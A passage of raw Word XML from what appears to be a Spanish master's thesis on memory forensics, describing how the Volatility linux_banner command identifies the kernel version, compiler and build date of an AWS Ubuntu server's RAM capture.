style="position:absolute;left:318;top:-145;width:38042;height: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R1fxwAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9fS8Mw&#10;EH8X9h3CDXxz6cZaS102xkAo6ItVBN+O5taWNZeSZGvtpzeC4OP9/t/uMJle3Mj5zrKC9SoBQVxb&#10;3XGj4OP9+SEH4QOyxt4yKfgmD4f94m6HhbYjv9GtCo2IIewLVNCGMBRS+rolg35lB+LIna0zGOLp&#10;GqkdjjHc9HKTJJk02HFsaHGgU0v1pboaBfPxc55K7S7lzIG/Xqv8ZTx5pe6X0/EJRKAp/Iv/3KWO&#10;89MsS7eP+TaF358iAHL/AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAC0pHV/HAAAA4wAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId150" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1101" type="#_x0000_t202" style="position:absolute;left:38563;top:318;width:15469;height:4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CnRyAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/PS8Mw&#10;FL4L/g/hCV7EpXWzG3XZGENBdxl2u3h7NG9NtXkpSbrV/94IgseP7/dyPdpOnMmH1rGCfJKBIK6d&#10;brlRcDy83C9AhIissXNMCr4pwHp1fbXEUrsLv9O5io1IIRxKVGBi7EspQ23IYpi4njhxJ+ctxgR9&#10;I7XHSwq3nXzIskJabDk1GOxpa6j+qgarYD/72Ju74fS828ym/u04bIvPplLq9mbcPIGINMZ/8Z/7&#10;Vaf5+WKa5cXjHH4vJQxy9QMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD0ECnRyAAAAOIA&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="6DA35D3A" w14:textId="139E4F5E" w:rsidR="00300365" w:rsidRPr="00B168FF" w:rsidRDefault="00300365" w:rsidP="00300365">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>25</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="70" w:name="_Toc155782592"/>
                        <w:r w:rsidR="001C1ADA">
                          <w:t xml:space="preserve">Comando </w:t>
                        </w:r>
                        <w:r w:rsidRPr="0040581F">
                          <w:t>linux_banner.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="70"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Otro dato de interés es la versión del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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3309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la información de distribución de Linux. Esto es útil para identificar la versión específica del sistema operativo que se estaba ejecutando. Para ello se ejecuta el comando </w:t>
      </w:r>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003309C7" w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_banner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C55CBD" w14:textId="53B485D5" w:rsidR="00B97A1E" w:rsidRPr="00E16AE3" w:rsidRDefault="00E16AE3" w:rsidP="003309C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E16AE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[Anexo</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16AE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E16AE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E16AE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155718857 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E16AE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00E16AE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>VIII. Comando linux_banner.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E16AE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E16AE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E56B71" w14:textId="3FC09C5E" w:rsidR="003309C7" w:rsidRPr="003309C7" w:rsidRDefault="003309C7" w:rsidP="003309C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Un análisis de Información del Kernel de Linux es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F325F3" w14:textId="099AD7F6" w:rsidR="003309C7" w:rsidRPr="00EE7CE6" w:rsidRDefault="003309C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Versión del Kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4303A994" w14:textId="78F6E156" w:rsidR="003309C7" w:rsidRPr="00EE7CE6" w:rsidRDefault="003309C7" w:rsidP="00EE7CE6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La captura de memoria analizada corresponde a un sistema que ejecuta la versión 4.15.0-1021-aws del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Linux. Este dato era ya conocido en el TFM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8D657C" w14:textId="71F9A0C9" w:rsidR="003309C7" w:rsidRPr="00EE7CE6" w:rsidRDefault="003309C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ambiente </w:t>
      </w:r>
      <w:r w:rsidRPr="00085656">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B56F478" w14:textId="1B26E246" w:rsidR="00890F70" w:rsidRDefault="003309C7" w:rsidP="00890F70">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">El sufijo </w:t>
      </w:r>
      <w:r w:rsidR="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aws</w:t>
      </w:r>
      <w:r w:rsidR="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sugiere que esta versión del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> está optimizada o diseñada para ejecutarse en Amazon Web Services</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services: Plataforma de servicios de computación en la nube ofrecida por Amazon.</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EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>como ya hemos comentado anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E90F609" w14:textId="7A67CE01" w:rsidR="003309C7" w:rsidRPr="00EE7CE6" w:rsidRDefault="003309C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Construcción y Compilador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3B8F3C" w14:textId="60FCDF8E" w:rsidR="003309C7" w:rsidRPr="00EE7CE6" w:rsidRDefault="003309C7" w:rsidP="00EE7CE6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La captura incluye detalles de la compilación del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, como el compilador utilizado (gcc version 7.3.0) y la configuración específica de Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Ubuntu 7.3.0-16ubuntu3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F2D414" w14:textId="6BC63F22" w:rsidR="003309C7" w:rsidRPr="00EE7CE6" w:rsidRDefault="003309C7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Número de Compilación y Fecha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BED098" w14:textId="0099F743" w:rsidR="003309C7" w:rsidRPr="00EE7CE6" w:rsidRDefault="003309C7" w:rsidP="00EE7CE6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se muestra el número de compilación (#21-Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMP) y la fecha (Tue Aug 28 10:23:07 UTC 2018), que proporcionan un contexto sobre cuándo y cómo se construyó esta versión del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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EE7CE6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E230254" w14:textId="77777777" w:rsidR="003309C7" w:rsidRPr="003309C7" w:rsidRDefault="003309C7" w:rsidP="003309C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esta respuesta básicamente te indica la versión exacta del sistema operativo Linux que estaba corriendo en la máquina de la cual se tomó la captura de memoria. Es un paso esencial en el análisis forense, ya que te permite seleccionar o validar el perfil correcto en Volatility para un análisis más detallado y preciso de la captura de memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06D7CC" w14:textId="52E51492" w:rsidR="009B1250" w:rsidRDefault="003309C7" w:rsidP="003309C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Aunque este dato ya lo sabíamos anteriormente, la salida muestra que la versión del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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3309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> es 4.15.0-1021-aws. Esta es una versión específica para las instancias de Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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3309C7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidRPr="00085656">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003309C7">
        <w:rPr>
